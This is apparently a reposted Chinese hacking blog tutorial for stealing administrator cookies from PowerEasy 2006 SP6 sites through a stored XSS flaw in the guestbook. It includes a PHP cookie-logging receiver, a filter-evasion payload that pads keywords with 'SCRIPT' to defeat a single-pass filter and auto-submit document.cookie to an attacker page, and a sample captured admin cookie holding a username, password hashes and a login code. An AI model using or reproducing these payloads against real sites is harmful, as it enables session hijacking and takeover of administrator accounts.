动易2006_SP6最新漏洞得到管理员密码

鬼仔注：从7j那里看到的，有7个j写接收页面。

7j:没有找到他说的接收页面，只有自己用PHP写个了

$filename = date("Ymd").".txt";

$time = @date("Y年m月d号H点i分s秒",time());

$cookie = $_POST['cookie'];

$url = $_POST['url'];

$hostname = $_POST['hostname'];

if ($cookie <> ""){

$tmp = fopen($filename,"a ");

fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");

fclose($tmp);

}

?>

来源:′失眠ヤ夜 's blog

漏洞主要出现在雁过留声(留言板)

让我们测试一下漏洞

打开留言板，选择源代码模式签署留言

在审核发表状态下钓到管理员Cookies概率比较高

我们先来试试一些文字

输入<>未被过滤

输入

输入scrSCRIPTipt会过滤成script(去掉中间的大写SCRIPT)

看 漏洞出来了

也就是说，它会把"Script"过滤掉字符，但只过滤一次，给了我们一个机会

(iframe您可以自己测试标签）

以下是一个收获Cookies会把代码Cookies提交到http://localhost/cookies/cookies.asp，我会将相关代码打包到教程中

现在我们插入一些可能的敏感字符SCRIPT防止我们的代码被过滤

更改后的代码如下：

rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();

现在我们留言

看 数据库中的代码是我们修改前的代码

现在作为管理员登录

现在我们保存cookies数据库是空的

这是我发的钓鱼Cookies的网页

好的，现在代码已经执行了，管理员Cookies已经被我们抓住了

让我们看看

ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8

怎么样？得到了吗？

有管理员的用户名、密码和管理认证码

信息管理和短信也可以短信了。

这里说说吧 拿到源码后，先修改设置，conn.asp改变数据库路径

还有test.htm里的URL也要改，可以用它做测试